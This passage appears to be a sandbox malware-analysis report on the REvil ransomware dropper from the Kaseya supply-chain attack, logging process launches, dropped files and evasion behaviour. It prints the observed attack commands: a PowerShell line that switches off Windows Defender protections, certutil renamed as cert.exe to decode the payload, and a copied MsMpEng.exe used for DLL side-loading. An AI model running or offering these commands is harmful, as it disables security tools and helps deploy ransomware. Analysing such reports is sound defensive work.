        Source: C:\Users\user\Desktop\agent.exe, type: DROPPEDMatched rule: APT_MAL_REvil_Kaseya_Jul21_2 date = 2021-07-02, hash5 = d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20, hash4 = d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f, hash3 = cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6, hash2 = 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd, hash1 = 0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402, author = Florian Roth, description = Detects malware used in the Kaseya supply chain attack, hash6 = e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2, reference = https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b
        Source: classification engineClassification label: mal84.rans.troj.evad.winBAT@14/10@0/1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210715Jump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:956:120:WilError_01
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4p4f3yn.ecm.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\first_stage.bat' '
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\first_stage.bat' '
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe 'C:\WINDOWS\system32\cmd.exe' /c ping 127.0.0.1 -n 2
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent Never
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\cert.exe C:\Windows\cert.exe -decode C:\Users\user\desktop\agent.crt C:\Users\user\Desktop\agent.exe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\agent.exe C:\Users\user\Desktop\agent.exe'
        Source: C:\Users\user\Desktop\agent.exeProcess created: C:\Windows\MsMpEng.exe C:\Windows\MsMpEng.exe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe 'C:\WINDOWS\system32\cmd.exe' /c ping 127.0.0.1 -n 2 Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent Never Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\cert.exe C:\Windows\cert.exe -decode C:\Users\user\desktop\agent.crt C:\Users\user\Desktop\agent.exe Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\agent.exe C:\Users\user\Desktop\agent.exe'Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2 Jump to behavior
        Source: C:\Users\user\Desktop\agent.exeProcess created: C:\Windows\MsMpEng.exe C:\Windows\MsMpEng.exeJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: MsMpEng.pdb source: cert.exe, 00000009.00000002.632837299.0000010BDFBA0000.00000004.00000001.sdmp, agent.exe, 0000000B.00000000.648796036.0000000000E75000.00000002.00020000.sdmp, MsMpEng.exe, 0000000C.00000000.651893828.0000000000BE1000.00000020.00020000.sdmp, agent.exe.9.dr
        Source: Binary string: certutil.pdb source: cert.exe, 00000009.00000000.625173217.00007FF7EB9B9000.00000002.00020000.sdmp, cert.exe.0.dr
        Source: Binary string: certutil.pdbGCTL source: cert.exe, 00000009.00000000.625173217.00007FF7EB9B9000.00000002.00020000.sdmp, cert.exe.0.dr
        Source: cert.exe.0.drStatic PE information: real checksum: 0x18af66 should be: 0x184405
        Source: mpsvc.dll.11.drStatic PE information: real checksum: 0xc5ba6 should be: 0xc5da6
        Source: cert.exe.0.drStatic PE information: section name: .didat

        Persistence and Installation Behavior:

        barindex
        Drops executables to the windows directory (C:\Windows) and starts themShow sources
        Source: C:\Users\user\Desktop\agent.exeExecutable created and started: C:\Windows\MsMpEng.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\cert.exeJump to behavior
        Source: C:\Windows\cert.exeFile created: C:\Users\user\Desktop\agent.exeJump to dropped file
        Source: C:\Users\user\Desktop\agent.exeFile created: C:\Windows\MsMpEng.exeJump to dropped file
        Source: C:\Users\user\Desktop\agent.exeFile created: C:\Windows\mpsvc.dllJump to dropped file
        Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\cert.exeJump to dropped file
        Source: C:\Users\user\Desktop\agent.exeFile created: C:\Windows\MsMpEng.exeJump to dropped file
        Source: C:\Users\user\Desktop\agent.exeFile created: C:\Windows\mpsvc.dllJump to dropped file
        Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\cert.exeJump to dropped file
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Uses ping.exe to sleepShow sources
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2 Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5244Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3809Jump to behavior
        Source: C:\Windows\MsMpEng.exeWindow / User API: threadDelayed 9950Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2376Thread sleep count: 5244 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2376Thread sleep count: 3809 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552Thread sleep time: -3689348814741908s >= -30000sJump to behavior
        Source: C:\Windows\MsMpEng.exe TID: 5856Thread sleep count: 9950 > 30Jump to behavior
        Source: C:\Windows\MsMpEng.exeLast function: Thread delayed
        Source: C:\Windows\MsMpEng.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000005.00000002.615206476.000001C018D30000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: powershell.exe, 00000005.00000002.615206476.000001C018D30000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: powershell.exe, 00000005.00000002.615206476.000001C018D30000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: powershell.exe, 00000005.00000002.615206476.000001C018D30000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Disables Windows Defender (via service or powershell)Show sources
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent Never
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent Never Jump to behavior
        Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)Show sources
        Source: C:\Users\user\Desktop\agent.exeFile created: C:\Windows\MsMpEng.exeJump to dropped file
        Drops or copies certutil.exe with a different name (likely to bypass HIPS)Show sources
        Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\cert.exeJump to dropped file
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe 'C:\WINDOWS\system32\cmd.exe' /c ping 127.0.0.1 -n 2 Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent Never Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\cert.exe C:\Windows\cert.exe -decode C:\Users\user\desktop\agent.crt C:\Users\user\Desktop\agent.exe Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\agent.exe C:\Users\user\Desktop\agent.exe'Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2 Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent Never
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent Never Jump to behavior
        Source: MsMpEng.exe, 0000000C.00000002.813034566.00000000015A0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: MsMpEng.exe, 0000000C.00000002.813034566.00000000015A0000.00000002.00000001.sdmpBinary or mem